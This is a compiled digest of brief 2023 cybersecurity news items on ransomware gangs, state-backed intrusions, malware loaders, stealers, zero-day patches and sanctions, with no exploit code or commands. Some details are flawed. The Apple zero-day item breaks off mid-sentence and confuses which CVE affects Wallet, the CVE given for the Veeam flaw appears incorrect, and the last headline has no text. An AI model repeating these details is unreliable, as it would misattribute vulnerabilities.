An espionage threat group tracked as 'Redfly' hacked a national electricity grid organization in Asia and quietly maintained access to the breached network for six months. These new findings come from Symantec, who found evidence of ShadowPad malware activity in the organization's network between February 28 and August 3, 2023, along with keyloggers and specialized file launchers.

Microsoft Teams Phishing Attack Pushes Darkgate Malware

A recent phishing scheme has exploited Microsoft Teams messages as a means to distribute harmful attachments that deploy the DarkGate Loader malware. This campaign commenced in late August 2023, as phishing messages originating from two compromised external Office 365 accounts were observed, targeting various organizations. These accounts were employed to deceive Microsoft Teams users into downloading and launching a ZIP file titled "Alterations to the holiday calendar."

'Evil Telegram' Android Apps on Google Play Infected 60K with Spyware

Several malicious Telegram clones for Android on Google Play were installed over 60,000 times, infecting people with spyware that steals user messages, contacts lists, and other data. The apps appear to be tailored for Chinese-speaking users and the Uighur ethnic minority, suggesting possible ties to the well-documented state monitoring and repression mechanisms. The apps were discovered by Kaspersky, who reported them to Google.

Ragnar Locker Claims Attack on Israel's Mayanei Hayeshua Hospital

The Ragnar Locker ransomware gang has claimed responsibility for an attack on Israel's Mayanei Hayeshua hospital, threatening to leak 1 TB of data allegedly stolen during the cyberattack. The cyberattack on Mayanei Hayeshua occurred in early August, disrupting the hospital's record-keeping system and preventing new patients from receiving care.

Ransomware Attack Wipes Out Four Months of Sri Lankan Government Data

Sri Lanka's government cloud system, Lanka Government Cloud (LGC), has fallen victim to a massive ransomware attack that began on August 26, 2023. The attack resulted in the encryption of LGC services and backup systems, affecting approximately 5,000 email addresses using the "gov[dot]lk" domain, including those of the Cabinet Office.

UK and US Sanction 11 Members of the Russia-Based TrickBot Gang

The United States, in coordination with the United Kingdom, sanctioned eleven more individuals who are members of the Russia-based Trickbot cybercrime group. The sanctions were provided by the U.S. Department of the Treasury’s Office of Foreign Assets Control. The sanctioned TrickBot members worked as administrators, managers, developers, and coders, who have materially supported the operations of the group. The group has been tied to Russian intelligence services and has targeted the U.S. government, companies and hospitals.

Mac Users Beware: Malvertising Campaign Spreads Atomic Stealer macOS Malware

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called Atomic Stealer (or AMOS), indicating that it's being actively maintained by its author. An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering features were detected in the wild, targeting gamers and cryptocurrency users.

Apple Discloses 2 New Zero-Days Exploited to Attack iPhones, Macs

Yesterday, Apple issued emergency security updates to address two zero-day flaws that were exploited in attacks targeting iPhone and Mac users. The vulnerabilities are being tracked as CVE-2023-41064 (discovered by Citizen Lab security researchers) and CVE-2023-41061 (discovered by Apple) and were found in the Image I/O and Wallet frameworks. CVE-2023-41064 relates to a validation issue in Wallet which can be exploite

Attackers Leverage Windows Advanced Installer to Drop Cryptocurrency Malware

Attackers operating from IP addresses in France, Luxembourg, and Germany have been utilizing the legitimate Windows tool, Advanced Installer, to create software packages that deliver cryptocurrency mining malware onto computers in various sectors. The malware payloads, as reported by Cisco Talos researchers on September 7, include the M3_Mini_RAT client stub. This remote access trojan enables the attackers to establish backdoors and to download and execute additional threats, including PhoenixMiner for Ethereum cryptocurrency mining and IOIMiner, a multi-coin mining threat.

Mirai Variant Infects Low-Cost Android TV Boxes for DDoS attacks

A variant of the Mirai malware botnet has been observed infecting affordable Android TV set-top boxes that are widely used for media streaming by millions of users. Dr. Web's antivirus team reports that this trojan represents a fresh iteration of the 'Pandora' backdoor, initially seen in 2015. The primary focus of this campaign is on economical Android TV boxes such as the Tanix TX6 TV Box, MX10 Pro 6K, and H96 MAX X3.

September Android Updates Fix Zero-Day Exploited in Attacks

As part of the September 2023 Android security updates, Google addressed 33 vulnerabilities, including a high-severity zero-day that is actively being exploited in the wild. Tracked as CVE-2023-35674, the zero-day flaw impacts the Android Framework and could allow threat actors to escalate privileges on vulnerable devices without requiring user interaction or additional execution privileges.

US and UK Sanction 11 TrickBot and Conti Cybercrime Gang Members

The USA and the United Kingdom have sanctioned eleven Russian nationals associated with the TrickBot and Conti ransomware cybercrime operations. The TrickBot malware operation launched in 2015 and focused on stealing banking credentials. However, over time, it developed into a modular malware that provided initial access to corporate networks for other cybercrime operations, such as Ryuk and, later, Conti ransomware operations.

China, North Korea Pursue New Targets While Honing Cyber Capabilities

China has developed a new capability using artificial intelligence to automatically generate images for influence operations in the United States and other democracies. These images aim to mimic U.S. voters across the political spectrum and create controversy along racial, economic, and ideological lines. Microsoft's Threat Analysis Center (MTAC) has observed China-affiliated actors using AI-generated visual media in campaigns that focus on politically divisive topics and denigrate U.S. political figures and symbols.

New Python Variant of Chaes Malware Targets Banking and Logistics Industries

Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes. ‘It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol,’ Morphisec said in a new detailed technical write-up shared with The Hacker News.

New BLISTER Malware Update Fueling Stealthy Network Infiltration

An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic. ‘New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments,’ Elastic Security Labs researchers Salim Bitam and Daniel Stepanic said in a technical report published late last month.

W3ll Phishing Kit Hijacks Thousands of Microsoft 365 Accounts, Bypasses MFA

An entity identified as W3LL created a phishing toolkit capable of evading multi-factor authentication and employed various tools to compromise over 8,000 corporate Microsoft 365 accounts. Over the course of ten months, security experts detected the utilization of W3LL's resources and infrastructure in the establishment of approximately 850 phishing campaigns, targeting login credentials for more than 56,000 Microsoft 365 accounts.

Smishing Triad Targeted USPS and US Citizens for Data Theft

The "Smishing Triad" cybercriminal group, believed to be Chinese-speaking, has been targeting individuals worldwide through a package tracking text scam sent via iMessage. Impersonating various postal services and government agencies, including the Royal Mail, New Zealand Postal Service, Correos, Postnord, Poste Italiane, and the Italian Revenue Service, the group aims to collect personal and payment information for identity theft and credit card fraud.

APT28 Cyberattack: Msedge as a Bootloader, TOR, and Mockbin[.]org/Website[.]hook Services as a Control Center

The government computer emergency response team of Ukraine, CERT-UA, recorded a targeted cyber attack against a critical energy infrastructure facility in Ukraine. To implement the malicious plan, an e-mail message with a fake sender address and a link to an archive, for example, "photo.zip", was distributed. Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file "weblinks.cmd" to the victim's computer.

MITRE and CISA Release OT Attack Emulation Tool

A new open source tool designed to emulate cyber-attacks against operational technology (OT) has been released by MITRE and the US Cybersecurity and Infrastructure Security Agency (CISA). MITRE Caldera for OT is now publicly available as an extension to the open-source Caldera platform on GitHub.

Exploit Released for Critical VMware SSH Auth Bypass Vulnerability

Summoning Team’s Sina Kheirkhah recently published a proof-of-concept exploit code for a critical SSH authentication bypass vulnerability in VMware’s Aria Operations for Networks analysis tool. Tracked as CVE-2023-34039, the vulnerability can be exploited by remote attackers to bypass SSH authentication on unpatched appliances and access the tool’s command line interface.

German Financial Agency Site Disrupted by DDoS Attack Since Friday

The German Federal Financial Supervisory Authority (BaFin) announced today that an ongoing distributed denial-of-service (DDoS) attack has been impacting its website since Friday. BaFin is Germany’s financial regulatory authority, part of the Federal Ministry of Finance, responsible for supervising 2,700 banks, 800 financial service providers, and 700 insurance service providers.

Hackers Exploit MinIO Storage System to Breach Corporate Networks

Two recent vulnerabilities in MinIO have been exploited by threat actors to breach object storage systems. This access allows the actors to view private information, execute arbitrary code, and potentially take over servers. MinIO is an open-source storage service that is compatible with various cloud containers, including Amazon S3.

Okta: Hackers Target IT Help Desks to Gain Super Admin, Disable MFA

Researchers at Okta issued a warning regarding social engineering attacks directed at IT service desk agents serving U.S.-based clients. The aim of these attacks was to deceive these agents into resetting multi-factor authentication (MFA) for users with elevated privileges. The attackers' ultimate objective was to gain control of Okta Super Administrator accounts, which have extensive privileges. This access would enable them to exploit identity federation functionalities, permitting impersonation of users within the compromised organization.

North Korean Hackers Behind Malicious VMConnect PyPI Campaign

North Korean state-sponsored hackers are behind the VMConnect campaign that uploaded malicious packages to the PyPI (Python Package Index) repository, one of them mimicking the VMware vSphere connector module vConnector. The packages were uploaded at the beginning of August, with one named VMConnect targeting IT professionals seeking virtualization tools.

WordPress Migration Add-on Flaw Could Lead to Data Breaches

Researchers found a vulnerability in All-in-One WP Migration, a widely used plugin for migrating WordPress sites with an active user base of 5 million. This vulnerability involves unauthorized manipulation of access tokens, potentially granting attackers access to sensitive site data. All-in-One WP Migration is a user-friendly tool tailored for WordPress site migration.

Paramount Discloses Data Breach Following Security Incident

American entertainment giant Paramount Global disclosed a data breach after its systems got hacked and attackers gained access to personally identifiable information (PII). Paramount said in breach notification letters signed by Nickelodeon Animation Studio EVP Brian Keane sent to affected individuals that the attackers had access to its systems between May and June 2023.

Cisco VPNs with No MFA Enabled Hit by Ransomware Groups

Since March 2023 (and possibly even earlier), affiliates of the Akira and LockBit ransomware operators have been breaching organizations via Cisco ASA SSL VPN appliances. “In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups),” Rapid7 researchers said on Tuesday.

How to Prevent ChatGPT From Stealing Your Content & Traffic

ChatGPT and similar large language models (LLMs) have added further complexity to the ever-growing online threat landscape. Cybercriminals no longer need advanced coding skills to execute fraud and other damaging attacks against online businesses and customers, thanks to bots-as-a-service, residential proxies, CAPTCHA farms, and other easily accessible tools.

Easy-to-Exploit Skype Vulnerability Reveals Users’ IP Address

A vulnerability in Skype mobile apps can be exploited by attackers to discover a user’s IP address – a piece of information that may endanger individuals whose physical security depends on their general location remaining secret. The security vulnerability has been discovered by a security researcher named Yossi, who privately reported it to Microsoft and demonstrated its effective exploitation to journalist Joseph Cox.

Spain Warns of LockBit Locker Ransomware Phishing Attacks

The Spanish National Police has issued an alert about an active ransomware campaign known as 'LockBit Locker,' which is currently targeting architecture firms in the country using phishing emails. According to the translated police statement, a series of emails have been identified as being sent to architecture companies.

Four in Five Cyber-Attacks Powered by Just Three Malware Loaders

Researchers from ReliaQuest found that cybercriminals relied primarily on seven different malware loaders to carry out attacks in the first half of 2023. QakBot, SocGholish, and Raspberry Robin were the most commonly used loaders, accounting for roughly 80% of all intrusions. GootLoader, ChromeLoader, Guloader, and Ursnif were also commonly seen.

MalDoc in PDFs: Hiding Malicious Word Docs in PDF Files

Japan's computer emergency response team (JPCERT) is sharing a new 'MalDoc in PDF' attack detected in July 2023 that bypasses detection by embedding malicious Word files into PDFs. The file sampled by JPCERT is a polyglot recognized by most scanning engines and tools as a PDF, yet office applications can open it as a regular Word document (.doc). Polyglots are files that contain two distinct file formats that can be interpreted and executed as more than one file type, depending on the application reading/opening them.

Microsoft: Stealthy Flax Typhoon Hackers Use Lolbins to Evade Detection

Microsoft has detected a new hacking collective referred to as Flax Typhoon. This group focuses on government bodies, educational institutions, vital manufacturing units, and IT organizations, presumably with the aim of espionage. The attackers avoid heavy usage of malware for infiltrating and controlling victim networks. Instead, they opt for utilizing existing components within the operating system, often referred to as living-off-the-land binaries (LOLBins), along with legitimate software.

KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities

An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. ‘The binary now includes support for Telnet scanning and support for more CPU architectures,’ Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, observed since July 16, 2023, comes months after it emerged that the botnet is being offered as a DDoS-for-hire service to other threat actors.

Rhysida Claims Ransomware Attack On Prospect Medical, Threatens to Sell Data

The Rhysida ransomware group recently claimed responsibility for a cyberattack targeting Prospect Medical Holdings, a US healthcare company operating 16 hospitals in California, Connecticut, Pennsylvania, and Rhode Island and a network of 166 outpatient clinics and centers. The attack allegedly took place on August 3rd, with employees finding ransom notes on their systems stating that their network was hacked and devices had been encrypted. Due to the attack, the hospitals were forced to shut down their IT networks to mitigate the impact, causing employees to use paper charts.

Poland’s Authorities Investigate a Hacking Attack on Country’s Railways

Poland's Internal Security Agency (ABW) and national police are investigating a hacking attack on the country's state railway network. The attack disrupted railway traffic overnight and triggered an emergency status that stopped trains near the city of Szczecin. The attack is suspected to be part of broader destabilization efforts by Russia, possibly in conjunction with Belarus.

New Study Sheds Light on Adhubllka Ransomware Network

Cybersecurity experts have revealed an intricate network of interconnected ransomware types that all stem from a shared origin: the Adhubllka ransomware group. Netenrich, a cybersecurity firm, conducted a study exploring the lineage of various ransomware versions, such as LOLKEK, BIT, OBZ, U2K, and TZW. The researchers discovered significant resemblances in code, tactics, and infrastructure among these apparently distinct ransomware types. By tracking the evolution of these variants, the experts established a genealogical link connecting them to the original Adhubllka ransomware, which emerged in January 2020.

New Telegram Bot "Telekopye" Powering Large-scale Phishing Scams from Russia

A new financially motivated operation is leveraging a malicious Telegram bot to help threat actors scam their victims. Dubbed Telekopye, a portmanteau of Telegram and kopye (meaning "spear" in Russian), the toolkit functions as an automated means to create a phishing web page from a premade template and send the URL to potential victims, codenamed Mammoths by the criminals.

Jupiter X Core WordPress plugin could let hackers hijack sites

WordPress security company Patchstack discovered two critical vulnerabilities affecting Jupiter X Core, a premium visual editor plugin for setting up WordPress and WooCommerce websites. The first flaw, tracked as CVE-2023-38388, allows unauthenticated threat actors to upload files, which could lead to arbitrary code execution on the server.

Whiffy Recon Malware: New Threat Analysis and Insights

Researchers from Secureworks Counter Threat Unit (CTU) have identified a new Wi-Fi scanning malware named Whiffy Recon, which has been dropped by the Smoke Loader botnet. This malicious code employs nearby Wi-Fi access points as reference points for Google's geolocation API to triangulate the positions of infected systems.

Ransomware Hackers' Dwell Time Drops to 5 Days, RDP Still Widely Used

Ransomware threat actors are reducing the time they spend within compromised networks before being detected by security solutions. In the first half of this year, the median dwell time for these hackers decreased to five days from nine days in 2022. However, the overall median dwell time for all cyberattacks dropped to eight days from ten in 2022, indicating a general trend of quicker detection. Ransomware attacks constituted nearly 69% of all recorded cyberattacks during this period.

FBI Identifies Wallets Holding Cryptocurrency Funds Stolen by North Korea

The FBI in the United States issued a cautionary notice regarding the potential efforts of threat actors associated with North Korea to convert pilfered cryptocurrency, totaling over $40 million in value. In a disclosure, the Federal Bureau of Investigation outlined the actions of six cryptocurrency wallets operated by entities connected to North Korea. These wallets possess approximately 1,580 Bitcoin, equivalent to around $41 million based on current valuations. Authorities suspect these funds are connected to the recent heist of a substantial sum of cryptocurrency, amounting to hundreds of millions of dollars.

Russian Toolkit Aims to Make Online Scamming Easy for Anyone

A toolkit possibly developed by Russian individuals, known as Telekopye to security experts, aims to let fraudsters focus on refining their social engineering skills, freeing them from the technical aspects of online scams. Eset researchers uncovered a tool they named Telekopye, derived from the combination of "Telegram" and "kopye," the Russian word for spear.

Over 3,000 Openfire Servers Vulnerable to Takeover Attacks

Thousands of Openfire servers remain vulnerable to CVE-2023-32315, an actively exploited path traversal vulnerability that allows an unauthenticated user to create new admin accounts. Openfire is a widely used Java-based open-source chat (XMPP) server that has been downloaded 9 million times. On May 23, 2023, it was disclosed that the software was impacted by an authentication bypass issue affecting all versions from 3.10.0, released in April 2015, up to that point.

Hosting Firm Says it Lost All Customer Data After Ransomware Attack

Danish hosting firms CloudNordic and AzeroCloud recently disclosed that they suffered a ransomware attack, causing the firms to lose a majority of customer data and shut down all systems, including websites, emails, and customer sites. Since the attack took place last Friday, IT teams have only managed to restore some of the servers without any data, with CloudNordic stating that the restoration process isn’t going smoothly and that much of their customers’ data seems irrecoverable.

FBI: Patches for Recent Barracuda ESG Zero-Day Ineffective

The Barracuda Email Security Gateway (ESG) vulnerability, identified as CVE-2023-2868, has been exploited by a Chinese state-sponsored cyberespionage group named UNC4841. This vulnerability affects Barracuda ESG versions 5.1.3.001 to 9.2.0.006, enabling attackers to perform command injections via specially crafted TAR file attachments in emails. Despite Barracuda's patch release in May 2023, the FBI has found that the patches are ineffective, and the vulnerability remains actively exploited.

A North Korean State-Backed Hacking Group Leveraged Zoho's ManageEngine ServiceDesk for Compromise

The North Korean state-backed hacker group Lazarus has been exploiting a critical vulnerability (CVE-2022-47966) in Zoho's ManageEngine ServiceDesk software to compromise an internet backbone infrastructure provider and healthcare organizations. This campaign began in early 2023, targeting entities in the U.S. and U.K. The attackers employed the QuiteRAT malware and a newly identified remote access trojan (RAT) named CollectionRAT. The latter was discovered through the analysis of the group's infrastructure.

Scarab Ransomware Deployed Worldwide Via Spacecolon Toolset

ESET researchers found the Spacecolon toolkit spreading Scarab ransomware across global organizations. It exploits weak web servers or RDP credentials for entry, with Turkish elements hinting at a Turkish-speaking developer. Spacecolon dates back to May 2020, with ongoing campaigns and a recent May 2023 build. ESET hasn’t linked it to any known group and has named the actor “CosmicBeetle”.

Akira Ransomware Targets Cisco VPNs to Breach Organizations

There's mounting evidence that Akira ransomware targets Cisco VPN (virtual private network) products as an attack vector to breach corporate networks, steal, and eventually encrypt data. Akira ransomware is a relatively new ransomware operation launched in March 2023, with the group later adding a Linux encryptor to target VMware ESXi virtual machines.

WinRAR Zero-Day Exploited Since April to Hack Trading Accounts

According to Group-IB, a WinRAR zero-day vulnerability was actively exploited to install malware when clicking on harmless files in an archive, allowing hackers to breach online cryptocurrency trading accounts. Tracked as CVE-2023-38831, the vulnerability is triggered by creating specially crafted archives with a slightly modified structure compared to safe files, which causes WinRAR's ShellExecute function to receive an incorrect parameter when it attempts to open the decoy file.

Scraped data of 2.6 million Duolingo users released on hacking forum

The scraped data of 2.6 million Duolingo users was leaked on a hacking forum, allowing threat actors to conduct targeted phishing attacks using the exposed information. Duolingo is one of the largest language learning sites in the world, with over 74 million monthly users worldwide. In January 2023, someone was selling the scraped data of 2.6 million Duolingo users on the now-shut-down Breached hacking forum for $1,500. This data includes a mixture of public login and real names, and non-public information, including email addresses and internal information related to the Duolingo service.

Ivanti Warns of New Actively Exploited MobileIron Zero-Day Bug

US-based software company Ivanti has issued a warning to its customers about ongoing exploitation of a critical Sentry API authentication bypass vulnerability. The vulnerability affects Ivanti Sentry, which serves as a gatekeeper for enterprise ActiveSync and SharePoint servers, as well as a Kerberos Key Distribution Center Proxy server. The cybersecurity firm Mnemonic discovered the vulnerability (CVE-2023-38035), which allows unauthorized attackers to access sensitive admin portal configuration APIs through port 8443, used by the MobileIron Configuration Service (MICS).

Carderbee Hacking Group Hits Hong Kong Orgs in Supply Chain Attack

An undisclosed Advanced Persistent Threat (APT) hacking collective known as 'Carderbee' has been detected launching assaults on various institutions situated in Hong Kong and other parts of Asia. This group employs authentic software to infiltrate victims' machines with the PlugX malware. According to findings from Symantec, the legitimate software involved in this supply chain breach is Cobra DocGuard, designed by the Chinese developer 'EsafeNet.' This software is typically employed in security applications for tasks like data encryption and decryption.

Sneaky Amazon Google ad leads to Microsoft support scam

A legitimate-looking ad for Amazon in Google search results redirects visitors to a Microsoft Defender tech support scam that locks up their browser. Today, BleepingComputer was alerted to what appeared to be a valid advertisement for Amazon in the Google search results. The advertisement shows Amazon's legitimate URL, just like in the company's typical search result.

New Variant of XLoader macOS Malware Disguised as 'OfficeNote' Productivity App

A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called ‘OfficeNote.’ ‘The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg,’ SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis.

Cuba Ransomware Uses Veeam Exploit Against Critical U.S. Organizations

The Cuba ransomware group has been observed launching attacks against critical infrastructure organizations in the US and IT firms in Latin America. They utilize a mix of both old and new tools. In early June 2023, BlackBerry’s Threat Research and Intelligence Team identified this recent campaign. They have noted that Cuba now uses CVE-2023-27543 to extract credentials from configuration files.

HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack

The threat actors behind the HiatusRAT malware have returned from their hiatus with a new wave of reconnaissance and targeting activity aimed at Taiwan-based organizations and a U.S. military procurement system. Besides recompiling malware samples for different architectures, the artifacts are said to have been hosted on new virtual private servers (VPSs), Lumen Black Lotus Labs said in a report published last week.

Interpol Arrests 14 Suspected Cybercriminals For Stealing $40 Million

An international law enforcement operation led by Interpol has led to the arrest of 14 suspected cybercriminals in an operation codenamed 'Africa Cyber Surge II,' launched in April 2023. The four-month operation spanned 25 African countries and disrupted over 20,000 cybercrime networks engaged in extortion, phishing, BEC, and online scams, responsible for financial losses of over $40,000,000.

Alarming Lack of Cybersecurity Practices on World’s Most Popular Websites

The Cybernews research team delved into an often overlooked aspect of website security—HTTP security headers. These headers guide browsers in interacting with web pages, defending against cyber threats. They studied the top 100 sites, including Pinterest, IMDB, and Facebook. Results revealed many popular websites lacking crucial security measures, raising concerns for both site owners and users.

Google Chrome's New Feature Alerts Users About Auto-Removal of Malicious Extensions

Google has announced plans to add a new feature in the upcoming version of its Chrome web browser to alert users when an extension they have installed has been removed from the Chrome Web Store. The feature, set for release alongside Chrome 117, allows users to be notified when an add-on has been unpublished by a developer, taken down for violating Chrome Web Store policy, or marked as malware.

New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft

A new "mass-spreading" social engineering campaign is targeting users of the Zimbra Collaboration email server with an aim to collect their login credentials for use in follow-on operations. The activity, active since April 2023 and still ongoing, targets a wide range of small and medium businesses and governmental entities, most of which are located in Poland, Ecuador, Mexico, Italy, and Russia.

Monti Ransomware Targets VMware ESXi Servers With New Linux Locker

The Monti ransomware gang has returned, after a two-month break from publishing victims on their data leak site, using a new Linux locker to target VMware ESXi servers, legal, and government organizations. Researchers at Trend Micro analyzing the new encryption tool from Monti found that it has ‘significant deviations from its other Linux-based predecessors.’

Credentials for Cybercrime Forums Found on Roughly 120K Computers Infected with Info Stealers

Hudson Rock, a threat intelligence firm, uncovered cybercrime forum credentials on about 120,000 computers infected with various info-stealer malware. These compromised computers, spanning from 2018 to 2023, were largely owned by threat actors themselves. The analysis of over 14.5 million infected computers revealed hackers' identities through additional credentials, autofill data, and system info.

Almost 2,000 Citrix NetScaler servers backdoored in hacking campaign

As part of a joint effort with the Dutch Institute for Vulnerability Disclosure (DIVD), researchers at cybersecurity company Fox-IT (NCC Group) have uncovered a large-scale campaign that planted webshells on Citrix NetScaler servers vulnerable to CVE-2023-3519, a critical remote code execution flaw that was patched on July 18. By scanning the internet, they uncovered 2,491 webshells across 1,952 distinct NetScaler servers, which made up 6% of all NetScalers (31,127) vulnerable to CVE-2023-3519 globally as of July 21, 2023.

Major U.S. Energy Org Targeted in QR Code Phishing Attack

A phishing campaign was observed predominantly targeting a notable energy company in the US, employing QR codes to slip malicious emails into inboxes and bypass security. Roughly one-third (29%) of the 1,000 emails attributed to this campaign targeted a large US energy company, while the remaining attempts were made against firms in manufacturing (15%), insurance (9%), technology (7%), and financial services (6%). According to Cofense, who spotted this campaign, this is the first time that QR codes have been used at this scale, indicating that more phishing actors may be testing their effectiveness as an attack vector.

LinkedIn Accounts Hacked in Widespread Hijacking Campaign

LinkedIn is facing a surge of account breaches, leading to numerous accounts being either locked for security concerns or seized by malicious actors. According to a recent report from Cyberint, numerous LinkedIn users have expressed frustration over compromised accounts or access issues, with attempts to address these problems through LinkedIn support. Although LinkedIn’s support response time has lengthened, no official statement has been made yet.

File Sharing Site Anonfiles Shuts Down Due to Overwhelming Abuse

Anonfiles, a popular service for sharing files anonymously, has shut down after saying it can no longer deal with the overwhelming abuse by its users. Anonfiles allowed people to share files without their activity being logged. However, it soon became one of the most popular file-sharing services used by threat actors to share samples of stolen data, stolen credentials, and copyrighted material.

Cleaning Products Manufacturer Clorox Company Took Some Systems Offline After a Cyberattack

The Clorox Company, a prominent multinational consumer goods firm known for its household and professional cleaning, health, and personal care products, recently faced a cybersecurity breach that compelled them to take specific systems offline. Detecting unauthorized activity on their Information Technology (IT) systems, Clorox swiftly initiated measures to halt and rectify the situation, including offline system shutdowns, as stated in an 8-K filing.

Raccoon Stealer Malware Returns With New Stealthier Version

The resurgence of the Raccoon Stealer malware is marked by the release of version 2.3.0 after a 6-month hiatus. Raccoon Stealer is a well-known information-stealing malware that has been active since 2019, offered to threat actors through a subscription model at $200 per month. The malware targets over 60 applications to collect sensitive data such as login credentials, credit card details, browsing history, cookies, and cryptocurrency wallets.

Massive 400,000 Proxy Botnet Built With Stealthy Malware Infections

Researchers have discovered a widespread operation that distributed proxy server applications to over 400,000 Windows systems. These devices function as residential exit nodes without obtaining users’ permission, and a company is making money by charging for the proxy traffic that passes through these machines. Threat actors find residential proxies useful for carrying out extensive credential stuffing attacks using new IP addresses.

QwixxRAT: A New Windows RAT Emerges in the Threat Landscape

The Uptycs Threat Research team discovered the QwixxRAT (aka Telegram RAT) in early August 2023 while it was advertised through Telegram and Discord platforms. According to the experts, QwixxRAT is meticulously designed to steal a broad range of information, including data from browser histories, credit card details, screenshots, and keystrokes.

Multiple Flaws Uncovered in Data Center Systems

Multiple vulnerabilities have been discovered in data center power management systems and supply technologies, enabling unauthorized access and remote code injection by threat actors. These vulnerabilities can be exploited to gain full access to data center systems, perform remote code injection, and create backdoors, potentially compromising connected devices and the broader network. The vulnerabilities were found in CyberPower's PowerPanel Enterprise Data Center Infrastructure Management platform and Dataprobe's iBoot Power Distribution Unit.

Threat Actors Use Beta Apps to Bypass Mobile App Store Security

The FBI has raised an alert about a new strategy employed by cybercriminals. They are now pushing harmful “beta” editions of cryptocurrency investment applications on widely used mobile app stores. These apps are subsequently exploited to pilfer cryptocurrency. The perpetrators introduce these harmful apps to the mobile app stores under the guise of “beta” versions.

Ongoing Xurum Attacks on E-commerce Sites Exploiting Critical Magento 2 Vulnerability

E-commerce sites using Adobe's Magento 2 software are the target of an ongoing campaign that has been active since at least January 2023. The attacks, dubbed Xurum by Akamai, leverage a now-patched critical security flaw (CVE-2022-24086, CVSS score: 9.8) in Adobe Commerce and Magento Open Source that, if successfully exploited, could lead to arbitrary code execution. ‘The attacker seems to be interested in payment stats from the orders in the victim's Magento store placed in the past 10 days,’ Akamai researchers said in an analysis published last week, attributing the campaign to actors of Russian origin.

Almost All VPNs Are Vulnerable to Traffic-Leaking TunnelCrack Attacks

Researchers from New York University, New York University Abu Dhabi, and KU Leuven University have discovered several vulnerabilities affecting most VPN products that can be exploited by attackers to read user traffic, steal user information, or attack user devices. The attacks, known as TunnelCrack attacks, are independent of the VPN protocol being used and can reveal which websites a user is visiting, posing a significant privacy risk even if the user is using additional encryption such as HTTPS.

MaginotDNS Attacks Exploit Weak Checks for DNS Cache Poisoning

Researchers from UC Irvine and Tsinghua University have introduced a cache poisoning attack named 'MaginotDNS' that targets Conditional DNS (CDNS) resolvers, potentially compromising entire top-level domains (TLDs). This attack capitalizes on security inconsistencies in various DNS software and server modes, rendering around one-third of CDNS servers vulnerable.

Count of Organizations Affected by MOVEit Attacks Hits 637

A cyberattack on MOVEit file-transfer servers since late May has affected over 637 organizations. German cybersecurity company KonBriefing reported this number. It includes groups directly hacked through their MOVEit servers and others connected to users of Progress Software's file-transfer tool. The Clop ransomware group, thought to be Russian, is behind the attacks. They've taken data with personal details of about 41 million people.

New SystemBC Malware Variant Targets Southern African Power Company

An unknown threat actor has been linked to a cyber attack on a power generation company in southern Africa with a new variant of the SystemBC malware called DroxiDat as a precursor to a suspected ransomware attack. ‘The proxy-capable backdoor was deployed alongside Cobalt Strike Beacons in a south African nation's critical infrastructure,’ Kurt Baumgartner, principal security researcher at Kaspersky's Global Research and Analysis Team (GReAT), said.

New Statc Stealer Malware Emerges: Your Sensitive Data at Risk

Researchers at Zscaler recently disclosed details of a new information-stealing malware dubbed Statc Stealer that has been observed infecting Windows devices. Written in the C++ programming language, Statc Stealer is capable of performing filename discrepancy checks to prevent sandbox detection and reverse engineering analysis by security professionals.

Lapsus$ Hackers Took SIM-swapping Attacks to the Next Level

The U.S. government released a report after analyzing simple techniques, e.g. SIM swapping, used by the Lapsus$ extortion group to breach dozens of organizations with a strong security posture. Reviewing the group’s operations started in December last year following a long trail of incidents attributed to or claimed by Lapsus$ after leaking proprietary data from alleged victims.

Rhysida Ransomware Analysis Reveals Vice Society Connection

The newly surfaced Rhysida ransomware faction has swiftly become a concerning addition to the growing threat landscape. Its involvement in a series of impactful assaults since its emergence in May of this year has been linked to the well-known Vice Society ransomware group, which has been operating since 2021. Among the entities targeted by Rhysida are the Chilean Army and Prospect Medical Holdings. In a recent incident, the group’s attack had a far-reaching impact, affecting 17 hospitals and 166 clinics across the United States.

Missouri Warns That Health Info Was Stolen in IBM MOVEit Data Breach

This week, the Missouri Department of Social Services (DSS) disclosed that Medicaid healthcare information was potentially exposed after IBM suffered a data breach. The attack was carried out by the Clop ransomware gang, which has been hacking vulnerable MOVEit Transfer servers worldwide by exploiting a SQL injection vulnerability (CVE-2023-34362) in the file transfer solution.

NIST Expands Cybersecurity Framework with New Pillar

The US National Institute of Standards and Technology (NIST) has released a new draft version of its popular best practice security framework, designed to expand its scope and provide more guidance on implementation. The NIST Cybersecurity Framework (CSF) 2.0 is the first refresh since it was launched in 2014. It is designed to help organizations “understand, reduce and communicate about cybersecurity risk,” the standards body said.

Evilproxy Phishing Campaign Targets 120,000 Microsoft 365 Users

EvilProxy has emerged as a widely used phishing platform for attacking MFA-secured accounts. According to Proofpoint’s recent findings, over 120,000 phishing emails have been sent to more than a hundred organizations in an attempt to compromise Microsoft 365 accounts. Proofpoint’s research highlights a significant increase in successful cloud account takeovers, especially affecting top-level executives, over the last five months.

Microsoft August 2023 Patch Tuesday Warns of 2 Zero-Days, 87 Flaws

